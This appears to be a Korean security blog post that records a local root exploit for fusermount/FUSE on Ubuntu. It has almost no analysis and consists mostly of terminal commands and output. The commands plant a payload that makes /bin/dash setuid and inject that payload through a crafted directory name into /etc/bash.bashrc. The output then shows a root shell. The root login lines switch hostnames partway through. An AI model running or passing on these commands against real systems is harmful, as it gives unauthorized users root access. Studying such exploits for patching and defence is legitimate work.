/* FUSE Exploit Closed in all ubuntu OS */
/* 아직 제대로 된 분석은 못하였고 코드만 임시저장 :D */
/* 여유로운시간이 다시 온다면 상세 분석보고서를 작성해서 올릴게요!! */
/* https://gist.github.com/taviso/ecb70eb12d461dd85cba */
<취약한버전>
<TEST>
1. 일반 유저권한에서 아래와 같은순서 로 명령어를 입력.
2. 일반유저에서 'LIBMOUNT_MTAB'까지 입력을 한 후 root 가서버에 접속.
3. 일반유저는 root로 권한상승
[User]
blackcon@bk:~$
blackcon@bk:~$ id
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 7555 /tmp/exploit
blackcon@bk:~$ ls -la /tmp
합계 44
drwxrwxrwt 9 root root 4096 5월 22 16:05 .
drwxr-xr-x 24 root root 4096 5월 14 21:28 ..
drwxrwxrwt 2 root root 4096 5월 22 08:56 .ICE-unix
-r--r--r-- 1 root root 11 5월 22 08:56 .X0-lock
drwxrwxrwt 2 root root 4096 5월 22 16:04 .X11-unix
drwxrwxrwt 2 root root 4096 5월 22 15:59 VMwareDnD
-rw------- 1 blackcon blackcon 0 5월 22 08:56 config-err-8RAdOZ
-r-sr-sr-t 1 blackcon blackcon 20 5월 22 16:05 exploit
drwx------ 2 root root 4096 5월 22 08:56 pulse-PKdhtXMmr18n
drwx------ 2 blackcon blackcon 4096 5월 22 08:56 ssh-dffCiUhLpXS1
drwx------ 2 blackcon blackcon 4096 5월 22 15:59 vmware-blackcon
drwx------ 2 root root 4096 5월 22 08:56 vmware-root
blackcon@bk:~$ mkdir -p '/tmp/exploit||/tmp/exploit'
blackcon@bk:~$ ls -ls /tmp
합계 28
4 drwxrwxrwt 2 root root 4096 5월 22 15:59 VMwareDnD
0 -rw------- 1 blackcon blackcon 0 5월 22 08:56 config-err-8RAdOZ
4 -r-sr-sr-t 1 blackcon blackcon 20 5월 22 16:05 exploit
4 drwxrwxr-x 3 blackcon blackcon 4096 5월 22 16:06 exploit||
4 drwx------ 2 root root 4096 5월 22 08:56 pulse-PKdhtXMmr18n
4 drwx------ 2 blackcon blackcon 4096 5월 22 08:56 ssh-dffCiUhLpXS1
4 drwx------ 2 blackcon blackcon 4096 5월 22 15:59 vmware-blackcon
4 drwx------ 2 root root 4096 5월 22 08:56 vmware-root
blackcon@bk:~$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
blackcon@bk:~$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
blackcon@bk:~$ sh -c 'sh'
# id
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
#
========================================
[root] <- just login
blackcon@bk:~$ sudo su
[sudo] password for blackcon:
bash: /dev/fuse: 허가 거부
_ _ _
| | | | ( )
| |__ | | |/ ___ _____ ___ ____ _____
| _ \| |_/ )/___) (___ / _ \| _ \| ___ |
| |_) | _ (|___ | / __| |_| | | | | ____|
|____/|_| \_(___/ (_____\___/|_| |_|_____) @blackcon
root@jihwan:/home/jh304# id
uid=0(root) gid=0(root) groups=0(root)
root@bk:/home/blackcon#
'Security > [리얼] 취약점 분석' 카테고리의 다른 글
| Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs Local Root(CVE-2015-1328) (1) | 2015.06.17 |
|---|---|
| 리눅스 로컬 권한상승 취약점( CVE-2010-3847 )분석 (0) | 2014.08.15 |
| Adobe Flash Player 취약점(CVE-2012-0754) 분석 (0) | 2014.01.24 |
